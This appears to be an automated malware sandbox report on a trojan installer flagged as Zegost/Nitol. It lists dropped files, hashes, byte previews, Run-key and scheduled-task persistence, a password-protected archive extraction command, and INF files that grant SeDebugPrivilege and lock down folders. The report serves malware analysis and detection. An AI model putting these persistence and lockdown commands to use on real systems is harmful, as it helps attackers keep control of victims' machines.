Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): crl.edge.digicert.com, client.wns.windows.com, crl-symcprod.digicert.com, s2.symcb.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, sv.symcb.com, s.symcd.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, s1.symcb.com, fe3cr.delivery.mp.microsoft.com, ts-crl.ws.symantec.com, s.symcb.com, sv.symcd.com, ocsp.digicert.com, e16604.g.akamaiedge.net, mpki-ocsp.digicert.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target powershell.exe, PID 1340 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1584 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2536 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4600 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:07:08	API Interceptor	448x Sleep call for process: powershell.exe modified
10:07:29	API Interceptor	601397x Sleep call for process: 5ar6QsR4e.exe modified
10:07:32	API Interceptor	3x Sleep call for process: svchost.exe modified
10:07:42	API Interceptor	2989x Sleep call for process: iusb3mon.exe modified
16:07:31	Task Scheduler	Run new task: UserLoginStartupTask path: C:\ProgramData\program\iusb3mon.exe
16:07:34	Task Scheduler	Run new task: Windows Audio Endpoint Builder() path: C:\ProgramData\Data\un.exe s>x -o- -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\ /st
16:07:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
16:08:05	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
16:08:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
16:08:55	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	15405152
Entropy (8bit):	7.9969741858269074
Encrypted:	true
SSDEEP:	393216:3Ie8M7oB2JNBXx9PMkglRy3mtFFu9zDVKZpw:3Rh8B2vB2c+kZD
MD5:	E039E221B48FC7C02517D127E158B89F
SHA1:	79EED88061472AE590616556F31576CA13BFC7FB
SHA-256:	DC30E5DAB15392627D30A506F6304030C581FC00716703FC31ADD10FF263D70B
SHA-512:	87231C025BB94771E89A639C9CB1528763F096059F8806227B8AB45A8F1EA5CD3D94FDC91CB20DD140B91A14904653517F7B6673A142A864A58A2726D14AE4B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................j..........R5............@..........................p............@..............................................................'...........................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata...@...P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Download File

Process:	C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3810
Entropy (8bit):	3.5689360433547153
Encrypted:	false
SSDEEP:	96:tCnRigEptnknQGdinigV9ll7dHAmzFzJE+:WRGryQxnjrHy+
MD5:	69C282FDCD177C1AC4D6709EF841DA65
SHA1:	575CBAC132F5215C9446E6B440CA44A2082F0644
SHA-256:	943F169C31C319417E61586D8911057321DE04926E01E4CC3E6F57B3B032C28E
SHA-512:	6B686A5D6AABE4681C6E1C83D4F32BD55D9FA26FC25ED72ECD20676C6DD3BD49CEE4F1E5D1B25F2D3A90A994BE00BF3B1366075272D4C3EA16917806DBBE0EA7
Malicious:	true
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.2.-.1.0.-.2.4.T.0.3.:.3.1.:.2.7.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.d.m.i.n.i.s.t.r.a.t.o.r.<./.A.u.t.h.o.r.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.2.-.1.0.-.2.4.T.0.3.:.3.1.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.U.s.e.r.I.d.>.A.d.m.i.n.i.s.t.r.a.t.o.r.<./.U.s.e.r.I.d.>..... . . . . . .<.L.o.g.o.n.T.

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.35901589905449205
Encrypted:	false
SSDEEP:	6:6xKdoaaD0JOCEfMuaaD0JOCEfMKQmDCexKdoaaD0JOCEfMuaaD0JOCEfMKQmDC:6aaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
MD5:	C788EDB928436D0CE10A5BF198837D8A
SHA1:	F104B6AB797E0B16362BFB69F5000407CE6EFFD8
SHA-256:	E309925E38D727B91C5B0AD9FC86A778ECD0EBE80261F55E870AD6685B0CC0BD
SHA-512:	61F750C97F2E1EAF623486147F55B4BF39C34DF28DD124FA378973965A2AE0AAA967D71C88BE0D02E1B2D2B22E20199B9E817BE793A10C0CC9D12FE703E18CF2
Malicious:	false
Reputation:	unknown
Preview:	*.>...........k.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................k.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7304239977419108
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0s:9JZj5MiKNnNhoxup
MD5:	8FA7D7B13ADFEE20AA86B81508A50453
SHA1:	E5CA73CE9F4EF61E3103F2FDF576C3AFF69E752E
SHA-256:	AC86B5A6A97330718A9CB619F74DCF4AE63D0D92C2C7B0AB4A1DB17690AB5999
SHA-512:	0975B4477A94F8F8BDCD639EB4C9C1F14185F9DE18E9A9E61FC9973ED2E3503C44162C0D4A1D806E5FBBA1AEE64C4091690030506D1AC55F6F2332CCB2BD9E5E
Malicious:	false
Reputation:	unknown
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x05d6f23a, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.629149940834992
Encrypted:	false
SSDEEP:	1536:/SB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:/aza9iJa+2UtmOQOL
MD5:	F1941F804D83F284A7651714BE34552C
SHA1:	67D18864D77990365EFA5EF888D210DC7356DF0A
SHA-256:	DBA9A7344EF9806255AD7626A29F4F605DBDA41DC1055197D31036D0495A4E5A
SHA-512:	F4B53050CAA4F3D77E3E8E16796079FA5C78F6F75E9D288BEBD801BA07150E61FC5B62AC17E5A14DDD06C674C79C4A147EF344D92AAA9EF1E452E3A041BA24F9
Malicious:	false
Reputation:	unknown
Preview:	...:... .......P.......X\...;...{......................0.j.....0....\|..!....\|..h.g.....0....\|..0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................a..@0....\|..................o...0....\|...........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08087321400792213
Encrypted:	false
SSDEEP:	3:rn//UetYezJRVvq4p2UvDeJYVvT0tllDROD8AllHol///lZMPCyH:D/NzzJzvq4p2UvDeJYFT0tlOAApo5
MD5:	11EB4EA956CC0995CB73583065BDA5E5
SHA1:	25314624FE4DE784E278A80ED52A94E1831057AF
SHA-256:	01B86D2908FEB9069D8CBA8B7742743E84EA8B2D5F0F591949DCDB45C8D791D6
SHA-512:	FB7C85230C3EBE44B4E1CFB47241366E3907010B1D111FBC09DCE696F6FDBC2FE9D5621580FC13FFD0A51F4E140132A3809A1E2ABD35326A28962AA3E78835C5
Malicious:	false
Reputation:	unknown
Preview:	.J.i.....................................;...{..!....\|..0....\|..........0....\|o.0....\|..qO.=0....\|..................o...0....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Program\ziliao.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	226751
Entropy (8bit):	6.266039185870467
Encrypted:	false
SSDEEP:	6144:x/x6F5WCmLGEOmC4v8Z0J+c4v8Z0J+8I8:x/xSWYEOl
MD5:	C02AD46459D1344FDBD4E76F66AF3F13
SHA1:	9118BBF4BAACA1EFF14D1C54E991DEFDDAF95D02
SHA-256:	54B5FF44AA95F3AF32888074DFC826065F05D1199081AD62BD16FAA5F7CC3D4D
SHA-512:	E6DB4E722768F8715B66A671E660F25178CF3D9CA025B542F9C5D92F513426B6880ADAE57B4D178BC28A4589CEDBC99276EB91E531ED627DA36051568817037C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: C:\ProgramData\Microsoft\Program\ziliao.jpg, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: C:\ProgramData\Microsoft\Program\ziliao.jpg, Author: Joe Security
Reputation:	unknown
Preview:	....U....SV.q<W.U.D.x..tm.\|.\|.tf.\...]...t[.T...t. ..D.$..U...3.u..E..t:.<.3....}.....t...i..........C....u.].......;u.t..u.B;.r.3._^[..].}..u..E....P.U.......WQ.U...U..Q.e.......X-.....E..E...].U..QQd.0...SVW.@...P..A..r$3.z(...~.........ar......i.........Nu.....................u.3.j..T..........P.x. ..........3.b4.^.C........3.s.H..C........3...\p.C...........C..E..E.ntdlf.E.l.P.S..3...y....._....3......C....N...YY_^.C.[..].r..a...U......M..E.SV..u.3......MZ..f9.u.W.x<...?PE....s....L...f9G...d......f9G...W...j@h.....wP3.S.Q.......=....wT.E..u.V.P..~<3....]..}.f;G.sX.]......E..H...t+..8.t..0.@...P.E.Q.P.....8.v..w8.E.Q.P..E..M...(.E.A..G.;.M..E.\|.3........t`9.....tX..0.E.B..]...E...~1..TY....E..0..%....f;E.u...........+G4..2C;].\|.3.E....A....E.....u.........t.9.....tw...i..P.E..P..E...."....E.....u..H..P...M...U....t3.]...y.......F...P.u.........E.....E.....u.}.3.E.....E..@...u.........t?.L1.3.j.X+..M......]..E.E..t...Sj.V...M..E...@.M..E.;.u

C:\ProgramData\Program\iusb3mon.exe

Download File

Process:	C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2886752
Entropy (8bit):	7.897802214378586
Encrypted:	false
SSDEEP:	49152:4qR/LggTRM4kQH940oSag7B32CNt6h18dzRuzok1EGiH2zRHsnjiYYqh:4qRjgi2419Hra+BGGzzRuzT18/jiYYqh
MD5:	4764020339A4883862B79B60461B00D1
SHA1:	C8DEEB05F7DFF78F1D0CE0D93C8C4A3D43C3A7B2
SHA-256:	F96A8F315E9CC4469B12189E9BE3397CA670A11DE5C5A9C6D4CDB233FEB5E53B
SHA-512:	FC9B9CC0A4A36375FCDDB6DABC88B1EDE44797C7F01F1D0693FC43453FB446432035A217703799B0DAC26F57354A087D1502F237D7CF87F07B00D273E7A65DC4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.u.{.u.{.u..v.v.u..p...u..q.m.u..q.j.u..v.o.u..s.z.u..p.(.u..t.v.u.{.t...u.Y.\|.z.u.Y...z.u.Y.w.z.u.Rich{.u.........................PE..L...b.Lg...............$............X.?...........@...........................g.......+...@...........................................................+.`(.......................................................................................... L........................... ..` .........b..................@..@ h............j..............@... ............n..............@..@ ,....p.......4..............@..B.idata...............L..............@....rsrc................N..............@..@.winlice.@8..@......................`....boot.....'...?...'.................`..`........................................................................................................................

C:\ProgramData\mntemp

Download File

Process:	C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:nRCNy1:RH
MD5:	4FE801DF594FC39323DBCF6BFF60F3AE
SHA1:	9877B689BAEE92AA70BACC0696034B7EEA31308D
SHA-256:	FD2C0B4BDE7B7AEC86CB1EAB926D49FD3C56B3F6557B6B0E0F5C13F398CD2F86
SHA-512:	F71115C2960B588C35B5950C0332135AC567C6E46011898503FECADED1C21A0373C51FDC496A133BE7FBB4D862E9EA936FBC984E21937A8411452968583404B5
Malicious:	false
Reputation:	unknown
Preview:	@g.k....6g(..#.

C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2886752
Entropy (8bit):	7.897802214378586
Encrypted:	false
SSDEEP:	49152:4qR/LggTRM4kQH940oSag7B32CNt6h18dzRuzok1EGiH2zRHsnjiYYqh:4qRjgi2419Hra+BGGzzRuzT18/jiYYqh
MD5:	4764020339A4883862B79B60461B00D1
SHA1:	C8DEEB05F7DFF78F1D0CE0D93C8C4A3D43C3A7B2
SHA-256:	F96A8F315E9CC4469B12189E9BE3397CA670A11DE5C5A9C6D4CDB233FEB5E53B
SHA-512:	FC9B9CC0A4A36375FCDDB6DABC88B1EDE44797C7F01F1D0693FC43453FB446432035A217703799B0DAC26F57354A087D1502F237D7CF87F07B00D273E7A65DC4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.u.{.u.{.u..v.v.u..p...u..q.m.u..q.j.u..v.o.u..s.z.u..p.(.u..t.v.u.{.t...u.Y.\|.z.u.Y...z.u.Y.w.z.u.Rich{.u.........................PE..L...b.Lg...............$............X.?...........@...........................g.......+...@...........................................................+.`(.......................................................................................... L........................... ..` .........b..................@..@ h............j..............@... ............n..............@..@ ,....p.......4..............@..B.idata...............L..............@....rsrc................N..............@..@.winlice.@8..@......................`....boot.....'...?...'.................`..`........................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	390
Entropy (8bit):	3.70121954190789
Encrypted:	false
SSDEEP:	12:Q+eSREiRFGjowZaDaK2YhvfqlbTb47ZkW:Q+eSREMAF42SiJP4lB
MD5:	B66F55531E3BC2059BC9DC2925BD022D
SHA1:	D2F77035A6CFFF4F3FCE7F08902B790623C5C48A
SHA-256:	1A19404888C3463A206AE85DA582A233E4FF74E5AFEA7FCE71D24E3F71F88B8C
SHA-512:	8FE726CACE14EEFEDEBA9E9367F9D415B631525BF4EC1DD43C0A91890EF92382C1D24631165566114468BF0C38999569C7D5BAA3089BE1606DC243D2116FC129
Malicious:	false
Reputation:	unknown
Preview:	..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....[.F.i.l.e. .S.e.c.u.r.i.t.y.].....".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.r.o.g.r.a.m.".,.0.,.".D.:.A.R.(.D.;.O.I.C.I.;.D.T.S.D.R.C.W.D.;.;.;.W.D.).".....

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log

Download File

Process:	C:\Windows\SysWOW64\SecEdit.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	384
Entropy (8bit):	3.6991205247583334
Encrypted:	false
SSDEEP:	6:Q+qlf6Ahlc0oEiRHl89jowfxal6dtwalwN9+IlUSvfgDJrlbhEZUEn4lywCfHhkW:Q+eSREiRFGjowZaDaK2YhvfqlbEd7ZkW
MD5:	FA353436F217DA03FE4519A7E87768CC
SHA1:	766A1F589BABFD00B0CC0FEEDDB22E7DB408E975
SHA-256:	A0814A0E57FD427C73E0938D4B507EA43CDF1A720D27D36E5C7530099082E1CC
SHA-512:	43C3A23178A71B714FB9AEF57F8CB413C13E001DD28BD3DC0F23272F7FECEBB83E24892F0CF59331C1D6B111DCE7A91965793D2BE435939FAD72B184AFFB074F
Malicious:	false
Reputation:	unknown
Preview:	..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....[.F.i.l.e. .S.e.c.u.r.i.t.y.].....".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.D.a.t.a.".,.0.,.".D.:.A.R.(.D.;.O.I.C.I.;.D.T.S.D.R.C.W.D.;.;.;.W.D.).".....

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log

Download File

Process:	C:\Windows\SysWOW64\SecEdit.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	242
Entropy (8bit):	3.536378176812677
Encrypted:	false
SSDEEP:	6:Q+qlf6Ahlc0oEiRHl89jowfxal6dtwalwN9+IlUSvn:Q+eSREiRFGjowZaDaK2Yhvn
MD5:	1F3CD3C20662B3BB095A373DBD1DEC58
SHA1:	D5AA739E0BF5D0B103713AF5BBA01359530AABDF
SHA-256:	7EA20DD93DBB33C14C7D9772B39828B3360FBE080DF2B5AAD14BA3D838E18DA5
SHA-512:	08C554EE7F897B070DF94E6F3B5B366AE69B12D16F90D34B4CD4D9C95037D6178447B39E732FCCF898F6C768318AB117B03DB2363CD55CFACD7F53530D86FE0C
Malicious:	false
Reputation:	unknown
Preview:	..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log

Download File

Process:	C:\Windows\SysWOW64\SecEdit.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0af1iamo.pd0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mabzysg.shv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tim41p5.0ex.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tuczykz.yew.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dsd4ah0.h2m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1snhdvcm.0wu.psm1

Download File

